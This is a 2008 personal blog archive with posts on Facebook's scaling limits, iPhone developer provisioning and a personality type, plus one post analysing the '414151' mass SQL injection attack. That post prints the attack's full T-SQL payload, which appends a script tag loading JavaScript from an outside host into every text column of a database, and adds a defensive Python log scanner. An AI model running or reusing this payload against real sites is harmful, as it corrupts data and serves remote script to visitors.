The MacArthur Manifesto

July 1st, 2008


 

While recently listening to an edition of the Net@Night podcast, Amber MacArthur introduced a new segment of the show called Beef of the Week. She explained that she has basically been shut out of her Facebook account for months now. Turns out that she has too many friend requests and the Facebook platform cannot handle it. She is prevented from logging in and accepting the thousands of friend requests she has received. When she reached out to Facebook their answer was basically that there was nothing they could do and that she might try deleting all of the people that were attempting to befriend her. Not very social. Now Amber is kind of a Social Network poster child in that she dedicates most of her time promoting social media and networking and believes that the web is the best place to form communities. Seems to me that building their platform for and supporting users like Amber is in Facebook’s own best interest.

We use social networks like Facebook for many reasons.  Most people use it as a place where they can keep up with their friends no matter where they are.  But we are also seeing more and more groups being formed that relate to causes and charities.  These are very important communities and networks like Facebook become more relevant as they host and support them.  I spend a good part of my day thinking about how to promote organized social networks.  The questions I ask myself include what tools or mechanisms are best for a particular social network.  This typically boils down to a feature set and target demographic.  NOW I am thinking I have to also consider if the platform can handle the load. 

Should I create social networks on Facebook knowing they may not be able to handle it if it becomes popular?

User loyalty of Social Network websites has proven over time to be fickle. For the most part users go where their friends are. However, as we have seen in the past - my friends used to be at MySpace and now they are at Facebook. In a couple months they could be somewhere else. My main point is that if Facebook as a platform can’t handle the vast numbers of people who flock to these types of communities they will fail and the users will go someplace else.

The Mission: To use Facebook against themselves.  We must convince Facebook to fix their platform and to support people like Amber so we can continue to build important social communities.  Maybe we should create a "Free Amber" Facebook Fan page.

 

 

Posted by Barry | Filed in network, soul

Legos Rock

June 22nd, 2008

I love this type of creativity.  I want this in my office.

http://gizmodo.com/5018606/750000+brick-kennedy-space-center-is-the-mother-of-all-lego-models

 

 

Posted by Barry | Filed in via

Very funny…

June 19th, 2008

 

We often talk about telling our children to be careful about what they email, post to blogs or social networks, chat about online, tweet, instant message or whatever the kewl way to communicate is that day; telling them they need to be careful because the "Internet doesn’t forget". There is potential that everything they do online will stay online in some permanent way. For my day job we think a lot about this because we are trying to help kids get into college. More and more universities are getting more hip and more technically fluent where they understand what a Facebook Wall is. Our kids need to be careful about what they say, who they say it to, what groups they join, etc… so that these universities don’t hold it against them later.

 

A funny comic that Jeremy sent me…

 

 

Posted by Barry | Filed in via

Returned meself an iPhone!

April 23rd, 2008

Yup, had enough.  So three major reasons:

 

  1. Can’t get my iPhone provisioned so that I can put the applications I write on to it because the iPhone Developer program is closed at the moment.  (See my other posts on the subject)
  2. New 3G iPhone is strongly rumored to be coming out in the summer
  3. Email is just painful.  Yahoo push mail is a joke.  I blame both Apple and Yahoo for this, but mostly I believe it’s because of EDGE.  My hope is that the 3G iPhone will have a chance of having productive like email capabilities.

My conclusion was to return the iPhone (can do this within 30 days), get the free Nokia and then come this summer upgrade to a new iPhone 2.0 with 3G.  The rumors are also that the developer program will open up after the SDK is officially released.
 

My appreciation to the ATT store at 78th and Broadway for being so nice and understanding. 

 

Posted by Barry | Filed in soul

Apple: iPhone Developer Program on Hold. Barry: You Mother @#*)%$’s

April 22nd, 2008

Sorry, but I am still steamed over the whole Developer program.  Needed just one more rant about it…


Well, talk about taking the wind out of your sails.

Watch the momentum grow:

  1. I jumped in head first, bought an iPhone - hearts beating, new toy, I can touch it and it vibrates…
  2. Downloaded the SDK - WOW, Apple seems to have their shit together, gonna write my first Apple based program since college…
  3. Installed the tools - can’t believe Apple made good tools finally, the simulator looks rockin…
  4. Watched the videos - these are great, why are they all wearing the same tshirt, hope they make more of these…
  5. Read the documentation - ok, not so great, but more than I expected, they seem to be locking down the beta pretty good, why aren’t there more articles…
  6. Wrote my first program - heart is really racing now, I think I can do this, imagine the possibilities…
  7. Ran my app on the simulator - This thing really does rock, I hope it works this great on my phone, can’t wait to make my first commercial app, I am going to be a star at work, chicks will dig me…
  8. Switch the target from simulator to device - What does it mean "provision"?

 

So until they open back up the Developer program which is another friggin $100 I am more than willing to pay, I can’t "provision" my friggin iPhone.

 

OY.  Maybe the chicks will dig the simulator?  Hold on while I compile….

 

More info: 

http://www.macrumors.com/2008/03/14/apple-slowly-ramping-up-iphone-developer-program/

http://www.tuaw.com/2008/03/14/iphone-developer-rejection-letter-mass-mailing/

http://twitter.com/danielpunkass/statuses/771541151

http://twitter.com/davidweiss/statuses/771549002

http://www.iphoneatlas.com/2008/03/14/apple-rejecting-iphone-sdk-applicants-en-masse/

 

 

Posted by Barry | Filed in soul, via

Got meself an iPhone

April 18th, 2008

So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that. But it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought myself an iPhone.

 

According to Mossberg that was probably a mistake and probably a bigger one than I realized. He thinks the 3G version is coming out in June. My bad was that I didn’t realize it but in order to actually install the programs you write with the SDK on to your device it needs to be "provisioned". Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this. Anyway, I can’t get provisioned until I am accepted into the developer program and pay my $99. And at the moment they are not accepting applications:

 

Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.

I hope to keep writing about my experience, but for now.  See ya.
 

 

 

Posted by Barry | Filed in soul

SQL Injection is cool

April 18th, 2008

Overview

So seeing sites hacked is pretty cool unless it’s one of yours.  I kinda look at hacking as the end-all-be-all of elite programming.  Of course, the intent isn’t always good, but the techniques are artful.  I most recently witnessed an impressive SQL Injection hack on a website.  I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack" which appears to be the same code just implemented a little differently.  Of course anyone who has been hacked by this code will recognize these numbers.  As far as SQL Injection attacks go this one seems to have taken a similar systematic approach.  I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that.  I will list some references at the end.

The Details

There were a couple things that impressed me about this particular hack.

  1. The outcome was that the hack code inserted a <script> tag with a reference URL into every varchar column in the database. The site was running .Net, IIS with SQL Server 2000. I mention the technology because the script assumes SQL Server. That said, don’t fool yourself into thinking that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices, specifically inline or free SQL statements within code, and could occur on any (most) platform, language or database. The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve. It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
  2. The second thing that impressed me was the actual code that executed this varchar manipulation. It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.

The Possibilities

The possibilities of this hack scare me (and impress me).  When I started searching around the web for this 414151 script I found a good number of references.  Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also.  I list one link below of an article that talks about it quite a lot.  According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.

It is quite frightening when you think of such an effective and widespread hack that basically is designed to "phone home" and execute some unknown Javascript anytime the author decides to turn on his website (synchronized attack scenario) ….well…I think it would have made the news.

The Javascript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
The SQL Statement

DECLARE @T varchar(255),@C varchar(255)
-- Cursor over every user table (xtype='u') and its text-type columns
-- (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  -- Append the script tag to the current column in every row of the table
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.414151.com/fjp.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
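
A defender who finds a long hex literal like the one described above in a web server log can decode it to see what it would have run. The following is an added example, not code from the original post or from the attack; it assumes the literal is ASCII-range UTF-16LE (the byte layout SQL Server uses for nvarchar), and the keyword list, the request lines and the /products.aspx path are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# A run of at least 16 hex-encoded bytes, with or without a 0x prefix.
HEX_RUN = re.compile(r"(?:0x)?((?:[0-9A-Fa-f]{2}){16,})")

# Constructed watch list: T-SQL constructs that appear in the decoded statement.
SUSPICIOUS = ("exec(", "sysobjects", "syscolumns", "cursor", "<script")


def decode_hex_sql(hex_digits):
    """Return the text if hex_digits is ASCII-range UTF-16LE, else None."""
    try:
        raw = bytes.fromhex(hex_digits)
    except ValueError:
        return None
    # ASCII-range UTF-16LE: even length and every second byte is 0x00.
    if len(raw) % 2 or any(raw[1::2]):
        return None
    text = raw.decode("utf-16-le")
    if not all(c.isprintable() or c.isspace() for c in text):
        return None
    return text


def scan_line(line):
    """Return [(decoded_text, matched_keywords)] for hex literals in a log line."""
    findings = []
    for match in HEX_RUN.finditer(unquote_plus(line)):
        text = decode_hex_sql(match.group(1))
        if text is None:
            continue
        hits = [k for k in SUSPICIOUS if k in text.lower()]
        if hits:
            findings.append((text, hits))
    return findings


# Constructed sample input: a short fragment of the statement, hex-encoded the
# same way, placed in a made-up request line next to two harmless lines.
FRAGMENT = "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b"
SAMPLE_LOG = [
    "2008-01-01 00:00:01 GET /products.aspx id=12 200",
    "2008-01-01 00:00:02 GET /products.aspx sid=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b 200",
    "2008-01-01 00:00:03 GET /products.aspx id=12&v=0x" + FRAGMENT.encode("utf-16-le").hex() + " 500",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for text, hits in scan_line(entry):
            print(hits, "->", text)
```

The second sample line carries an ordinary 40-digit hex token; it is skipped because its odd-position bytes are not zero, which keeps session IDs and hashes from being reported.
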
Other references

Update (4/29)…

This one keeps going and going.

I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks.  I didn’t mention this earlier because this is inherent in all SQL Injection attacks.

 

Posted by Barry | Filed in soul

Good quote from CIO mag

April 17th, 2008

Any IT organization that’s willing to do without training, innovation, process improvements, client relationship building and other "keep-the-business-viable" activities is only postponing its inevitable demise.

 

Posted by Barry | Filed in soul

ENFJ

March 24th, 2008

Guess who is?

 

Of all the general personality types, ENFJ’s are the most outgoing and friendly. Their chief concern in life is other people, and fostering harmony and cooperation, between themselves and others.  They are more than willing to do your share in relationships. They try, always, to be friendly, sympathetic, cooperative and tactful.

 

They have strong ideals and a potent sense of loyalty, whether to an employer, a school, a hometown, or a favourite cause. One thing is certain: they do tend to idealize the people and things they value, and they like to be held in similarly high esteem.

 

They are a judging type, and disorganized situations strike them as chaotic. They are distinctly uncomfortable when they’re obliged to function without a schedule, a plan, or a clear idea of the objectives to be achieved.

 

If need be, they’ll provide the necessary direction, but they don’t insist on setting all the rules themselves. They accept authority.

 

They’re patient and conscientious. They make a concerted effort to stick to a job until it’s finished, and they believe it’s important to pay attention to detail. Perhaps more significantly, they base their personal habits on a feeling of obligation to the task, their profession, their friends, family and co-workers, or to the institution itself.

 

They don’t mind letting others know what their values are, and - given the authority - they may insist that others follow their code and their standards.

 

The combination of feeling and judgment is also the fertile soil upon which righteous indignation flowers. They may find it helpful to temper their strong feeling with a less emotional thinking approach to judgment and to balance their judgment with more open-minded perception.

 

 

Posted by Barry | Filed in us

First Post - Welcome

February 29th, 2008

Came time that I needed a presence. I used to redo my website every year, sometimes every six months. Well, it has been a while but lately I feel the necessity to jump back in. Through WordPress I can get things off and running and the thought was I would spend my time creating content instead of design but then it took me two days to pick a theme that someone else made. Best intentions I guess. Thanks for visiting.

 

Posted by Barry | Filed in network